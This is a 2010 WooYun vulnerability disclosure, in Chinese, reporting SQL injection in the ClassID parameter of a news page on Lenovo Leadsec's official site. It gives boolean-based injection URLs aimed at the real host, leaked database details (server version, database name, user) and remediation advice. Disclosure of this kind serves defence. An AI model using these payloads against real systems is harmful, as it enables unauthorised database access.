联想网御官网SQL注入漏洞
漏洞概要
缺陷编号:
WooYun-2010-00328
漏洞标题: 联想网御官网SQL注入漏洞
相关厂商:
联想网御
漏洞作者:
路人甲
提交时间: 2010-08-27 11:21
公开时间: 2010-08-27 16:22
漏洞类型: SQL注射漏洞
危害等级: 中
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org
Tags标签:
.net 字符类型注射 sqlserver
漏洞详情披露状态:
2010-08-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
http://www.leadsec.com.cn/News/Detail.aspx页面中ClassID过滤不充分。
详细说明:
页面存在sql注入。
漏洞证明:
http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=1--
http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=2--
数据库版本:Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2
数据库名:LenovoDomain_DB
连接用户:Lenovo_f
权限:Public
修复方案:
1、对输入参数ClassID过滤。
2、使用web应用防火墙。
版权声明:转载请注明来源
路人甲@
乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:6 (WooYun评价)
原文:http://www.wooyun.org/bugs/wooyun-2010-0328
搜索更多相关主题的帖子:
联想网御 网站漏洞 SQL注入